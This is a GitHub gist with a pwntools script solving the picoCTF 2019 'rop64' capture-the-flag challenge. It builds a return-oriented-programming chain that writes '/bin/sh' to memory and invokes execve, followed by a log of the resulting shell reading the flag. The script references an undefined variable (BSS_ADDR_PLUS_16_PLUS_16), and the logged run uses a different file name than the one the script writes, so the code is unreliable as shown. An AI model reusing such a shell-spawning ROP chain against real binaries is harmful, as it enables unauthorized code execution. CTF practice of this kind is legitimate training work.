Last active
October 14, 2019 19:40
-
-
Save 0x705h/96608e53956982a8b29d152c35a3f554 to your computer and use it in GitHub Desktop.
rop64 picoctf2019 solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| BSS = 0x00000000006bb2e0 | |
| BSS_ADDR = p64(BSS) | |
| BSS_ADDR_PLUS_16 = p64(BSS + 16) | |
| BSS_ADDR_PLUS_16_PLUS_8 = p64(BSS + 16 + 8) | |
| # to execute sys_execve in 64bit | |
| # we need to check on this table | |
| # https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ | |
| # the syscall number is 0x3b (59 dec in the table) in RAX | |
| # and the parameters are | |
| # %rdi %rsi %rdx | |
| # filename, argv[] envp[] | |
| # next 4 bytes controls ret | |
| # so, we need to set rdi, rsi, and rdx | |
| # and a place to write in memory to point the /bin//sh string | |
| # and their pointer | |
| # get the gadgets! | |
| # gadgets | |
| #0x0000000000400686 : pop rdi ; ret | |
| #0x00000000004100d3 : pop rsi ; ret | |
| #0x00000000004499b5 : pop rdx ; ret | |
| #0x000000000044707b : mov qword ptr [rdi], rsi ; ret | |
| #0x00000000004156f4 : pop rax ; ret | |
| #0x00000000004499b5 : pop rdx ; ret | |
| #0x000000000046827a : int 0x80 | |
| #0x0000000000449135 : syscall ; ret | |
| pop_rdi = p64(0x0000000000400686) | |
| pop_rsi = p64(0x00000000004100d3) | |
| pop_rdx = p64(0x00000000004499b5) | |
| pop_rax = p64(0x00000000004156f4) | |
| pop_rdx = p64(0x00000000004499b5) | |
| int80 = p64(0x000000000046827a) | |
| mov_rsi_to_rdi_content = p64(0x000000000044707b) | |
| syscall = p64(0x0000000000449135) | |
| expl = 'A'*24 | |
| # First, we copy to bss the /bin/sh string | |
| expl+= pop_rsi | |
| expl+= '/bin/sh\x00' # in 64 bits, we have enough space | |
| expl+= pop_rdi | |
| expl+= BSS_ADDR | |
| expl+= mov_rsi_to_rdi_content | |
| # then we copy the address where /bin/sh is for argv | |
| expl+= pop_rsi | |
| expl+= BSS_ADDR | |
| expl+= pop_rdi | |
| expl+= BSS_ADDR_PLUS_16 | |
| expl+= mov_rsi_to_rdi_content | |
| # and put zeroes after that ending the argv array | |
| expl+= pop_rsi | |
| expl+= p64(0x0) | |
| expl+= pop_rdi | |
| expl+= BSS_ADDR_PLUS_16_PLUS_16 | |
| expl+= mov_rsi_to_rdi_content | |
| # and prepare the syscall_execve | |
| # so, remembering:: | |
| # the syscall number is 0x3b (59 dec in the table) in RAX | |
| # and the parameters are | |
| # %rdi %rsi %rdx | |
| # filename, argv[] envp[] | |
| # next 4 bytes controls ret | |
| expl+= pop_rax | |
| expl+= p64(0x3b) | |
| expl+= pop_rdi | |
| expl+= BSS_ADDR | |
| expl+= pop_rsi | |
| expl+= BSS_ADDR_PLUS_16 | |
| expl+= pop_rdx | |
| expl+= p64(0x0) | |
| expl+= syscall # instead of int80, call syscall! | |
| info("Exploit str: %s" % expl) | |
| with open("expl.bin", "wb") as fd: | |
| fd.write(expl) | |
| info("Writing exploit to expl.bin binary") | |
| """ run like this | |
| [redacted]@pico-2019-shell1:/problems/rop64_2_28215c88506d7e5e93b4bdabe21a4d5b$ (cat /tmp/rop64tsh.bin; cat) | ./vuln | |
| Can you ROP your way out of this? | |
| ls | |
| ls | |
| flag.txt vuln vuln.c | |
| cat flag.txt | |
| picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_11cdd436} | |
| """ | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment